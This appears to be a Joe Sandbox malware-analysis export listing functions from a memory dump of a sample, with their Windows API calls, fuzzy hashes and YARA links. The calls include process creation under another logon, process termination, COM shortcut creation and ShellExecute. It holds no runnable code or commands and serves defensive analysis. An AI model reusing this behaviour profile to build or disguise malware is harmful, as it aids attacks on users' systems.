API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 3e27df09401138aaf040853fb191ac2049709d3e742c11ca08da5d7b6af8141d
Instruction ID: 8f445315525504c610db49bfcb3d35565829ed9cf1f6c5872394672c9c0c8efb
Opcode Fuzzy Hash: 3e27df09401138aaf040853fb191ac2049709d3e742c11ca08da5d7b6af8141d
Instruction Fuzzy Hash: 5341A834641A86AFDB15CF25D89DBE47BE0FB45715F1882A9E90C4B263CB315861CF50

Function 00244C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00244C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00244CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00244CEA
_wcslen.LIBCMT ref: 00244D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00244D10
_wcsstr.LIBVCRUNTIME ref: 00244D1A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: 1c832dbc9f6bbfdbdf53cbd10fe9666249b0c4fc3dd79ad4a5ad57f165fc8c77
Instruction ID: 97c4f5aaebc8063e8a33de95408ddff5ca3879f8305c3ffe38b8b26001da7838
Opcode Fuzzy Hash: 1c832dbc9f6bbfdbdf53cbd10fe9666249b0c4fc3dd79ad4a5ad57f165fc8c77
Instruction Fuzzy Hash: CB212632614205BBEB196F39EC89F7B7B9CDF45750F10803EF909CA192EBA1DC5186A0

Function 0025581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 001E3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001E3A97,?,?,001E2E7F,?,?,?,00000000), ref: 001E3AC2

_wcslen.LIBCMT ref: 0025587B
CoInitialize.OLE32(00000000), ref: 00255995
CoCreateInstance.OLE32(0027FCF8,00000000,00000001,0027FB68,?), ref: 002559AE
CoUninitialize.OLE32 ref: 002559CC

Strings

.lnk, xrefs: 00255876, 002558C1, 00255985

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
String ID: .lnk
API String ID: 3172280962-24824748
Opcode ID: efe8d3e8bc0ded4e2d582da325c7df6c7573b3bc828c3da6e9505b9e51eca790
Instruction ID: 6011796869cc342d44835254126770091a83dfead9212c1814fd9b6a5c9265f2
Opcode Fuzzy Hash: efe8d3e8bc0ded4e2d582da325c7df6c7573b3bc828c3da6e9505b9e51eca790
Instruction Fuzzy Hash: 14D16270618B119FC714DF25C494A2EBBE1EF89325F14885DF88A9B361DB31EC49CB92

Function 0024175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00240FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00240FCA
Part of subcall function 00240FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00240FD6
Part of subcall function 00240FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00240FE5
Part of subcall function 00240FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00240FEC
Part of subcall function 00240FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00241002

GetLengthSid.ADVAPI32(?,00000000,00241335), ref: 002417AE
GetProcessHeap.KERNEL32(00000008,00000000), ref: 002417BA
HeapAlloc.KERNEL32(00000000), ref: 002417C1
CopySid.ADVAPI32(00000000,00000000,?), ref: 002417DA
GetProcessHeap.KERNEL32(00000000,00000000,00241335), ref: 002417EE
HeapFree.KERNEL32(00000000), ref: 002417F5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 23a8cc9c1d5bce006adb5af76f450e614c2450379bcc5a2af1097d02458729f0
Instruction ID: 9704722632d0ffbcc8f1f0132a2c012a00e9b9dba7c1676fa019e43345312876
Opcode Fuzzy Hash: 23a8cc9c1d5bce006adb5af76f450e614c2450379bcc5a2af1097d02458729f0
Instruction Fuzzy Hash: 16118E31520206FFDB189FA4DC89BAEBBB9EB45355F204028F4499B210D735A9A4CB60

Function 002414CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 002414FF
OpenProcessToken.ADVAPI32(00000000), ref: 00241506
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00241515
CloseHandle.KERNEL32(00000004), ref: 00241520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0024154F
DestroyEnvironmentBlock.USERENV(00000000), ref: 00241563

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4ef3c6080da498994f6e17e97a0294e0ccd7900113b31ad577b9baa0368d68e2
Instruction ID: 3b7f1d7eb96bf07a1785778239daabe8efdecdbc4cac222dadcf6b4e7f32368d
Opcode Fuzzy Hash: 4ef3c6080da498994f6e17e97a0294e0ccd7900113b31ad577b9baa0368d68e2
Instruction Fuzzy Hash: D3113A7250120EEBDF159FA8ED49FDE7BA9EF48744F144059FA09A2060C375CEA0DB60

Function 00203382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00203379,00202FE5), ref: 00203390
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0020339E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002033B7
SetLastError.KERNEL32(00000000,?,00203379,00202FE5), ref: 00203409

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 12452be25b2da478d9a67b5f1089a6e62b356ad257706865d24ed69124921a5d
Instruction ID: 3226230621407ad8c418700aec0951143ca2ce484f8c3e7ec291b9e5185d4a09
Opcode Fuzzy Hash: 12452be25b2da478d9a67b5f1089a6e62b356ad257706865d24ed69124921a5d
Instruction Fuzzy Hash: 8A012832238312BFE7146B747CC95672A9CDB063753300269F510841F3FF224D715984

Function 00212D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00212598,002A8B28,0000000C,00202EF8,00000001,?,?), ref: 00212D78
_free.LIBCMT ref: 00212DAB
_free.LIBCMT ref: 00212DD3
SetLastError.KERNEL32(00000000), ref: 00212DE0
SetLastError.KERNEL32(00000000), ref: 00212DEC
_abort.LIBCMT ref: 00212DF2

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 6e851da56fb9051dc44b120c3e4a8395260064d88335fa98a325d74f8b0fb848
Instruction ID: a7343a9f824b449d9d3af3277669f5720f847aa8c0f7f5d838f13957831c0d4c
Opcode Fuzzy Hash: 6e851da56fb9051dc44b120c3e4a8395260064d88335fa98a325d74f8b0fb848
Instruction Fuzzy Hash: 64F0A931564502EBC6227B38FC0AEDA15D5ABE27B1B35041CF82C921D5EE348CF94560

Function 00278A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 001F9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 001F9693
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96A2
Part of subcall function 001F9639: BeginPath.GDI32(?), ref: 001F96B9
Part of subcall function 001F9639: SelectObject.GDI32(?,00000000), ref: 001F96E2

MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00278A4E
LineTo.GDI32(?,00000003,00000000), ref: 00278A62
MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00278A70
LineTo.GDI32(?,00000000,00000003), ref: 00278A80
EndPath.GDI32(?), ref: 00278A90
StrokePath.GDI32(?), ref: 00278AA0

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 4f3cc5f3139d53ae91ed538308d46434fd471026bcecf0f83a695f16c5fb24c8
Instruction ID: eacecea16dfe1e93f11b9bff0127949b073f9736022847e061ad798a825349c4
Opcode Fuzzy Hash: 4f3cc5f3139d53ae91ed538308d46434fd471026bcecf0f83a695f16c5fb24c8
Instruction Fuzzy Hash: 03110C7604014DFFDB119F90EC4CEAA7F6DEB04350F108015BA1995161C7719D95DBA0

Function 002451FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00245218
GetDeviceCaps.GDI32(00000000,00000058), ref: 00245229
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00245230
ReleaseDC.USER32(00000000,00000000), ref: 00245238
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0024524F
MulDiv.KERNEL32(000009EC,00000001,?), ref: 00245261

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 5974b3791541a33eab2f8ffcf7aea4ff5a6129d186b2899007b87b635afd79ae
Instruction ID: 05354142796e3f4e02c3281e845563e389c67fe4ab77ae978e11cc8f156b5bd1
Opcode Fuzzy Hash: 5974b3791541a33eab2f8ffcf7aea4ff5a6129d186b2899007b87b635afd79ae
Instruction Fuzzy Hash: EB016775E00715BBEB109FB59C49E5EBFB8EF44751F144065FA08A7281D6709C10CFA0

Function 001E1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 001E1BF4
MapVirtualKeyW.USER32(00000010,00000000), ref: 001E1BFC
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001E1C07
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001E1C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 001E1C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 001E1C22

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 95eadea90eca87fff4b37bf6a231a3e260c77908ab92715fa1b9b1161b570828
Instruction ID: b054f1e66eb2e7c75201e6fc6602d5609b279c9ecf284e66120bd462527cba89
Opcode Fuzzy Hash: 95eadea90eca87fff4b37bf6a231a3e260c77908ab92715fa1b9b1161b570828
Instruction Fuzzy Hash: 69016CB09027597DE3008F6A8C85B52FFA8FF59754F00411F915C47941C7F5A864CBE5

Function 0024EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0024EB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0024EB46
GetWindowThreadProcessId.USER32(?,?), ref: 0024EB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0024EB75

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 0ef825ea744dfd352d3fd44cc7df0844d45fa5a1e2d0d8384b3137371b0e181d
Instruction ID: 91df6d4f8846afc6aa1ca54580e3edee3baf780c9a8395fb44686667b3c0764d
Opcode Fuzzy Hash: 0ef825ea744dfd352d3fd44cc7df0844d45fa5a1e2d0d8384b3137371b0e181d
Instruction Fuzzy Hash: A4F03A72241559BBE7215B62AC4EEEF3A7CEFCAB11F10016CF609E1091D7A05A41CAB5

Function 00237439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00237452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00237469
GetWindowDC.USER32(?), ref: 00237475
GetPixel.GDI32(00000000,?,?), ref: 00237484
ReleaseDC.USER32(?,00000000), ref: 00237496
GetSysColor.USER32(00000005), ref: 002374B0

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: fc927c637a91fa1a91c15ca6763d019bc8751d489e3d8d0a4a9b63b4fa0218e8
Instruction ID: 3a1f0b048c7e0d0ca2ff31f499575abbbeb9a8d36587addddeab0b5e4c05a2bf
Opcode Fuzzy Hash: fc927c637a91fa1a91c15ca6763d019bc8751d489e3d8d0a4a9b63b4fa0218e8
Instruction Fuzzy Hash: 7A016D71414219EFDB616F74EC0CBAA7BB5FF44311F650168FA1AA21A1CB312E91EB50

Function 00241874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0024187F
UnloadUserProfile.USERENV(?,?), ref: 0024188B
CloseHandle.KERNEL32(?), ref: 00241894
CloseHandle.KERNEL32(?), ref: 0024189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002418A5
HeapFree.KERNEL32(00000000), ref: 002418AC

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: bec7a94e58c13132e516d388615d111db4292f1ba3f85a70e8bcc7c3aa7048e5
Instruction ID: c55a73d0e267144ac6e2adbda5532e931647ad309c39c55e0ad706a7e9fcaa06
Opcode Fuzzy Hash: bec7a94e58c13132e516d388615d111db4292f1ba3f85a70e8bcc7c3aa7048e5
Instruction Fuzzy Hash: 3CE05276104506BBEB016BB5FD0C94ABB69FB49B22B608639F22D91471CB3294A1DB50

Function 001EBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001EBEB3

Strings

D%+D%+, xrefs: 001EBCA5
D%+, xrefs: 001EBDED, 001EBD91, 001EBD1B
D%+, xrefs: 001EBCA2
D%+, xrefs: 001EBE9A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%+$D%+$D%+$D%+D%+
API String ID: 1385522511-4078072316
Opcode ID: 8311cb827c6202ee1385d23af2e762eb85410978137d4c1492cfa9e524e5c2f1
Instruction ID: 6a244e09194c03cdf1c4bef182ab74059298ea9a3ab07a93ce1dafc493bf5e8b
Opcode Fuzzy Hash: 8311cb827c6202ee1385d23af2e762eb85410978137d4c1492cfa9e524e5c2f1
Instruction Fuzzy Hash: DD915975A08A4ACFCB18CF9AC4D06AEB7F1FF58314F24816AD945AB351D731AD81CB90

Function 00267B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00200242: EnterCriticalSection.KERNEL32(002B070C,002B1884,?,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020024D
Part of subcall function 00200242: LeaveCriticalSection.KERNEL32(002B070C,?,001F198B,002B2518,?,?,?,001E12F9,00000000), ref: 0020028A

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

Part of subcall function 002000A3: __onexit.LIBCMT ref: 002000A9

__Init_thread_footer.LIBCMT ref: 00267BFB

Part of subcall function 002001F8: EnterCriticalSection.KERNEL32(002B070C,?,?,001F8747,002B2514), ref: 00200202
Part of subcall function 002001F8: LeaveCriticalSection.KERNEL32(002B070C,?,001F8747,002B2514), ref: 00200235

Strings

G, xrefs: 00267C7F
5, xrefs: 00267C78
Variable must be of type 'Object'., xrefs: 00267C3A
+T#, xrefs: 00267E2E

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T#$5$G$Variable must be of type 'Object'.
API String ID: 535116098-3608813932
Opcode ID: a496affa66f2f91c5f9e750f497bd8c2c3621dff9caeffe1a4154575ecb36c11
Instruction ID: fae8d92b5f472e8f20f2ff099e126c3a0e11cc6d406838ce638c4af72deeb214
Opcode Fuzzy Hash: a496affa66f2f91c5f9e750f497bd8c2c3621dff9caeffe1a4154575ecb36c11
Instruction Fuzzy Hash: AE91AE70A24209EFCB14EF54E881DBDB7B1FF49308F508459F8069B292DB71AEA5CB51

Function 0024C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0024C6EE
_wcslen.LIBCMT ref: 0024C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0024C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0024C7CA

Strings

0, xrefs: 0024C6AF

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 839435e90ce42a9d771e822575c8e579d5e0a53da69ff2c1d8b64b99c60a5591
Instruction ID: 3873f11aee4e533d84910c42d828664d095b8bc883f1dc34c5e55fd58d002a8f
Opcode Fuzzy Hash: 839435e90ce42a9d771e822575c8e579d5e0a53da69ff2c1d8b64b99c60a5591
Instruction Fuzzy Hash: 3F5113716263029BD7989F2CC884B6BB7E8AF85314F240A2DF595D31E1DB70D824CF52

Function 0026AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0026AEA3

Part of subcall function 001E7620: _wcslen.LIBCMT ref: 001E7625

GetProcessId.KERNEL32(00000000), ref: 0026AF38
CloseHandle.KERNEL32(00000000), ref: 0026AF67

Strings

@, xrefs: 0026AE72
<, xrefs: 0026AE6B

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
